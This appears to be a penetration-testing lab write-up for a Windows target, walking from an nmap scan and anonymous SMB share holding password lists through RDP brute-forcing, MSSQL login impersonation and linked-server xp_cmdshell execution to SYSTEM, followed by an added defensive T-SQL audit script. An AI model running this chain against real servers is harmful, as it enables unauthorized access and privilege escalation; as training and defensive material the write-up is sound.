ACS Hard Lab

nmap

PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=WIN-HARD
| rdp-ntlm-info: 
|   Target_Name: WIN-HARD
|   NetBIOS_Domain_Name: WIN-HARD
|   NetBIOS_Computer_Name: WIN-HARD
|   DNS_Domain_Name: WIN-HARD
|   DNS_Computer_Name: WIN-HARD
|   Product_Version: 10.0.17763
|_  System_Time: 2025-01-12T10:41:38+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-01-12T10:41:39
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 182.61 seconds

We have SMB and RDP. We should have MSSQL but it didn't fucking show up AGAIN. Motherfucker

Connecting to SMB

smbclient \\\\10.129.38.189\\Home

It allows anonymous access.

Fiona, John, and Simon are in the IT group.

Fiona's Creds.txt

Windows Creds

kAkd03SA@#!
48Ns72!bns74@S84NNNSl
SecurePassword!
Password123!
SecureLocationforPasswordsd123!!

John's information.txt

To do:
- Keep testing with the database.
- Create a local linked server.
- Simulate Impersonation.

John's secrets.txt

Password Lists:

1234567
(DK02ka-dsaldS
Inlanefreight2022
Inlanefreight2022!
TestingDB123

Simon's random.txt

Credentials

(k20ASD10934kadA
KDIlalsa9020$
JT9ads02lasSA@
Kaksd032klasdA#
LKads9kasd0-@

Brute-force RDP with the collected passwords; the valid pair is:

fiona:48Ns72!bns74@S84NNNSl

Connect to RDP

In PowerShell, check the running processes:

Get-Process
Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
    238      13    14940      17032              3308   0 sqlceip
    716     209   313660     198372              2680   0 sqlservr
    141       9     2020       7676              2720   0 sqlwriter

We can see that MSSQL (sqlservr) is running in the process list.

Connect to MSSQL

Since we know MSSQL is running, we can connect to it from our attacking Linux machine.
Fiona is a local Windows user, so the login is prefixed with `.\`:

sqsh -S 10.129.38.122 -U '.\\fiona' -P '48Ns72!bns74@S84NNNSl' -h

We can also connect to it from cmd.exe inside the RDP session by just typing:

sqlcmd

Checking for linked servers:
Communicate with Other Databases with MSSQL in MSSQL
#mssql_linked_server #mssql

1> SELECT srvname, isremote FROM sysservers
2> go
        WINSRV02\SQLEXPRESS        1
        LOCAL.TEST.LINKED.SRV      0

There is a linked server, LOCAL.TEST.LINKED.SRV (the entry with isremote = 0).

Identify which user(s) we can impersonate:

1> SELECT distinct b.name
2> FROM sys.server_permissions a
3> INNER JOIN sys.server_principals b
4> ON a.grantor_principal_id = b.principal_id
5> WHERE a.permission_name = 'IMPERSONATE'
6> go
        john                                                                     
        simon 

According to the hint, impersonate john:

1> EXECUTE AS LOGIN = 'john'
2> SELECT SYSTEM_USER
3> SELECT IS_SRVROLEMEMBER('sysadmin')
4> go
        john                                                                     
           0

Check that we can indeed execute statements on the linked server:

1> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [LOCAL.TEST.LINKED.SRV]
2> go

        WINSRV02\SQLEXPRESS
        Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
        Sep 24 2019 13:48:23
        Copyright (C) 2019 Microsoft Corporation
        Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
        testadmin

Enable xp_cmdshell on the linked server and execute whoami:

1> EXECUTE('
2>  EXEC sp_configure ''show advanced options'', 1;
3>  RECONFIGURE;
4>  EXEC sp_configure ''xp_cmdshell'', 1;
5>  RECONFIGURE;
6>  EXEC xp_cmdshell ''whoami''
7> ') AT [LOCAL.TEST.LINKED.SRV];
8> go
1> EXECUTE('xp_cmdshell ''whoami''') AT [LOCAL.TEST.LINKED.SRV];
2> go
        nt authority\system

Reading the flag:

1> EXECUTE('xp_cmdshell "type C:\Users\Administrator\Desktop\flag.txt >c:\users\fiona\desktop\x.txt"') AT [LOCAL.TEST.LINKED.SRV]
2> go

This copies the flag's contents to Fiona's desktop, where we can read it.
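As an added example (not part of this writeup), here is a T-SQL audit a defender, or a tester writing up findings, can run on the instance to surface the three conditions the chain above relied on: a linked server with RPC Out enabled whose login mapping lands on a privileged remote login, server-level IMPERSONATE grants, and xp_cmdshell being enabled. It assumes only standard SQL Server catalog views and a login allowed to read them; the `<all logins>` label is my own placeholder.

```sql
-- Added defensive audit script, not from the original writeup.
-- Assumes standard SQL Server catalog views and a login that can read them.

-- 1. Linked servers: which login the remote side runs as, and whether
--    RPC Out is on (EXECUTE ... AT needs it). A mapping row with
--    local_principal_id = 0 applies to every login on this instance.
SELECT  s.name                              AS linked_server,
        s.data_source,
        s.is_rpc_out_enabled,
        COALESCE(lp.name, '<all logins>')   AS local_login,   -- placeholder label
        ll.uses_self_credential,
        ll.remote_name                      AS runs_remotely_as
FROM    sys.servers s
LEFT JOIN sys.linked_logins     ll ON ll.server_id    = s.server_id
LEFT JOIN sys.server_principals lp ON lp.principal_id = ll.local_principal_id
WHERE   s.is_linked = 1;

-- 2. Server-level IMPERSONATE grants: who may run EXECUTE AS LOGIN as whom.
--    A grant to a low-privileged login whose target is sysadmin, or has a
--    privileged linked-server mapping, is the escalation path shown above.
SELECT  grantee.name AS can_impersonate,
        target.name  AS as_login,
        CASE WHEN IS_SRVROLEMEMBER('sysadmin', target.name) = 1
             THEN 'YES' ELSE 'no' END AS target_is_sysadmin
FROM    sys.server_permissions p
JOIN    sys.server_principals grantee ON grantee.principal_id = p.grantee_principal_id
JOIN    sys.server_principals target  ON target.principal_id  = p.major_id
WHERE   p.class_desc      = 'SERVER_PRINCIPAL'
  AND   p.permission_name = 'IMPERSONATE'
  AND   p.state_desc      = 'GRANT';

-- 3. xp_cmdshell state: value_in_use = 1 means OS command execution is
--    available to every sysadmin (and to anyone who can become one).
SELECT  name, value, value_in_use
FROM    sys.configurations
WHERE   name IN ('xp_cmdshell', 'show advanced options');

-- 4. Service account of the instance: if it is LocalSystem, xp_cmdshell
--    commands run as nt authority\system, as seen in the whoami output above.
SELECT  servicename, service_account
FROM    sys.dm_server_services;
```

A linked-server mapping should use a fixed, least-privileged remote login rather than a sysadmin, and xp_cmdshell should stay disabled unless a specific job needs it; re-running this script after changes confirms the fix.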